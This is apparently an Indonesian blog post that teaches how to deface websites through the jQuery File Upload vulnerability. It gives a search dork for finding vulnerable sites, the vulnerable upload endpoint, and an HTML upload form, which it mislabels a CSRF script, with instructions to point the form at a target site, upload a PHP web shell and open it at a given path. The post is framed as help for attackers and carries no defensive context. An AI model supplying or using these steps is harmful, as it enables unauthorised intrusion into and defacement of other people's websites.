Pada kesempatan kali ini saya akan memberikan tutorial deface menggunakan exploit JQuery File Upload Vulnerability
Dork : /assets/global/plugins/jquery-file-upload/ (kembangin biar jos)
Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/
Jika Vuln maka tampilannya seperti ini
Copy script CSRF di bawah ini & masukan ke Notepad lalu save dengan Extensi .html
Script CSRF :
<form method="POST" action="localhost/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>Jangan lupa ganti pada bagian "localhost" dengan web target, setelah itu silahkan di save
dan buka filenya dengan browser yang anda gunakan lalu upload shell sobat
jika berhasil makan tampilannya akan seperti ini
Shell Access :
http://localhost/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php
Jika kurang paham silahkan inbox saya di Facebook
Sekian dan terima kasih, semoga bisa membantu
Thanks : Unknown~X
Silahkan Komentarnya !!
Ketentuan Berkomentar :
1. Berkomentarlah Dengan Baik Dan Sopan
2. Tidak Punya Akun Beri Komentar Sebagai : Anonymous
3. Dilarang Meletakkan Link Hidup Maupun Link Mati
EmoticonEmoticon